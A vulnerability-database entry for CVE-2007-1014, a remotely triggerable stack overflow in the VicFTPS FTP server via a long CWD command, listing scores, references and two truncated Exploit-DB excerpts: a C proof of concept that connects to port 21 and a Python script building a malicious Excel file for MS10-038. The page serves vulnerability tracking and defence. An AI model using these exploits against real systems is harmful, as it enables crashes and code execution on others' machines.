CVE-2007-1014
published 2007-02-21CVE-2007-1014: Stack-based buffer overflow in VicFTPS before 5.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code…
PriorityP347critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
9.28%
94.7th percentile
Stack-based buffer overflow in VicFTPS before 5.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long CWD command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vicftps | vicftps | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Excel - 0x5D record Stack Overflow (MS10-038)
exploitdb·2010-07-14·CVSS 9.3
CVE-2010-0822 [CRITICAL] Microsoft Excel - 0x5D record Stack Overflow (MS10-038)
Microsoft Excel - 0x5D record Stack Overflow (MS10-038)
---
#This is an exploit for MS10-038/CVE-2010-0822
#Everything is hardcoded! (winxp sp3)
#webDEViL
#w3bd3vil[at]gmail[dot].com
#http://krash.in/excel1.xls
#Office 2007 - 12.0.4518.1014
#MS10-038 bulletin states that Office 2007 is not vulnerable, lol
import binascii
wD="d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000"
wD+="000000000000000000030000000100000000000000001000000200000004000000feff"
wD+="ffff00000000000000008000000000010000ffffffffffffffffffffffffffffffffff"
wD+="ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffff
Exploit-DB
VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)
exploitdb·2007-02-18
CVE-2007-1014 VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)
VicFTPS
#include
#include
#include
#include
#define PORT 21
int s;
struct sockaddr_in sock_addr;
char recvbuf[1024];
char pwn[450];
int main(int argc, char* argv[])
{
if (argc \n", argv[0]);
return 1; }
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
printf("error with socket\n");
return 1; }
sock_addr.sin_family = AF_INET;
sock_addr.sin_addr.s_addr = inet_addr(argv[1]);
sock_addr.sin_port = htons(PORT);
if (connect(s, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
printf("unable to connect\n");
return 1; }
printf("[+] Connected\n");
memset(recvbuf, '\0', 1024);
recv(s, recvbuf, 1024, 0);
char userbuf[50];
printf("[+] Sending user...\n");
memset(userbuf, '\0', 50);
memcpy(userbuf, "USER anonymous\r\n", 18);
if (send(s, userbuf, strlen(userbuf), 0) == -
No writeups or analysis indexed.
http://osvdb.org/33227http://secunia.com/advisories/24161http://vicftps.50webs.com/http://www.securityfocus.com/bid/22608http://www.vupen.com/english/advisories/2007/0648https://exchange.xforce.ibmcloud.com/vulnerabilities/32557https://www.exploit-db.com/exploits/3331http://osvdb.org/33227http://secunia.com/advisories/24161http://vicftps.50webs.com/http://www.securityfocus.com/bid/22608http://www.vupen.com/english/advisories/2007/0648https://exchange.xforce.ibmcloud.com/vulnerabilities/32557https://www.exploit-db.com/exploits/3331
2007-02-21
Published